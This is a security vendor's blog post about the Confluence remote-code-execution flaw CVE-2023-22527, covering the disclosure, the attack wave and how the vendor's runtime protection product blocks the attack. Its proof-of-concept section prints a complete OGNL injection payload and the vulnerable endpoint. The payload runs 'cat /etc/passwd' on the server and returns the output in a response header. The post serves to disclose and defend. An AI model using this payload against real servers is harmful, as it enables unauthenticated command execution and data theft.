Critical zero-day Confluence RCE vulnerability blocked by Contrast Runtime Security

If your organization is running an older version of Atlassian Confluence Server that’s affected by CVE-2023-22527 — the critical remote-code execution (RCE) zero day discovered recently — you either

1. Already patched it,
2. Didn’t have to worry about it because you were running Contrast Protect with Runtime Application Self Protection (RASP), or
3. Are under attack. 

Atlassian disclosed the cybersecurity issue on Jan. 16. The vulnerability, which involves a template injection vulnerability on out-of-date versions of Confluence Data Center and Server,  allows an unauthenticated attacker to achieve RCE on an affected version. Atlassian urged customers using an affected version to take immediate action.

The Common Vulnerability and Exposure (CVE) scored the top CVSS rating of 10 out of 10. It  affects Confluence Data Center and Server 8 versions released before Dec. 5, 2023 and Confluence versions 8.0.0 to 8.5.3.

600+ IP addresses launched thousands of attacks 

Proof-of-concept (PoC) code appeared on Jan. 21, and thousands of attempts to exploit CVE-2023-22527 soon followed. On Jan. 22, the threat-monitoring service Shadowserver reported that its servers were picking up attacks originating from 600+ unique IP addresses.

PoC

This is an example of the attack. It utilizes the endpoint:

/template/aui/text-inline.vm

And injects the following Object-Graph Navigation Language (OGNL) attack:

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"cat /etc/passwd"}))

This instantiates the class freemarker.template.utility.Execute and then calls the exec() method, which in turn calls java.lang.Runtime.exec(), which executes the command on the underlying operating system.  In this case, the command is:

cat /etc/passwd

The result is set to an HTTP Response Header named X-Cmd-Response. Through that, the result of the command is returned to the attacker.

How Contrast Runtime Security Blocks Attacks

Contrast Runtime Security (Contrast Protect) RASP already protects against this and similar vulnerabilities. Our Expression Language rule in Protect …

• tracks the request from the attacker, through the application;
• senses that classes are being instantiated based on user input; and, when required,
• blocks the attack before  any harmful action can be taken.

With Protect enabled, the attack is successfully blocked.

And while the request returns a 200 OK, no extra header is set and returned to the attacker.

Protect Confluence with Contrast Runtime Security

This is not the first critical vulnerability in Confluence. Similar attacks including CVE-2022-26134 and CVE-2021-26084 have been found and quickly exploited. Unfortunately, it is likely more will be found in the future. 

In fact, CVE-2023-22527 rounds out our “Zero Days Blocked Before Discovery Hall of Fame” to a dozen:

Zero Days Blocked Before Discovery Hall of Fame

Contrast detects & prevents exploitation against entire classes of
vulnerabilities via embedded detection rules.

Examples of zero days that Contrast mitigated before
they were discovered (before CVEs were issued):

• Atlassian Confluence — Server Site Template Injection opens risk to Remote Code Execution - CVE-2023-22527
• Spring/Kafka — Deserialization opens risk to Remote Code Execution - CVE-2023-34040
• Spring4Shell — Command Injection/ClassLoader manipulation - CVE-2023-22965 
• Log4Shell — Expression Language Injection - CVE-2021-44228
• Confluence OGNL Injection — CVE-2021-26084 
• Apache Struts2 — CVE-2020-17530
• Python Salt CVEs — CVE-2020-11651 & CVE-2020-11652
• Tomcat Server — CVE-2020-9484
• WebLogic Remote Code Execution (RCE) — CVE-2019-2725
• Apache Struts2 — CVE-2019-0230
• Apache Struts2 — CVE-2018-11776
• Jenkins XStream — CVE-2016-0792

Contrast studies new exploits and CVEs to enhance/harden the
Protect rules for real-time protection (e.g., improved JDNI rules and 
added ClassLoader Manipulation detection).

The Contrast Runtime Security Platform was created in response to the fact that applications are perpetually accosted by hackers intent on doing harm to your business. We recognize that it is virtually impossible to create applications that are completely free of vulnerabilities. The Runtime Security agent continuously detects and prevents both known threats and zero-day attacks by leveraging multi-technique precision sensors and dynamic control over the runtime. It offers an instrumentation-based approach that simplifies security deployment and scalability. 

Using Runtime Security on Confluence or other potentially insecure applications can help to improve your security posture.

Get in touch today for a demo of Contrast Protect: your RASP solution against zero days.

Read more:

• Ditch your setlist: Zero-day partiers are already rocking your system | Blog
• Contrast discovers MLflow framework zero-day that threatens to poison machine language models | Blog
• Contrast Security Protect shields applications from zero-day attacks | Blog
• Contrast Application Security Platform | Solution Brief PDF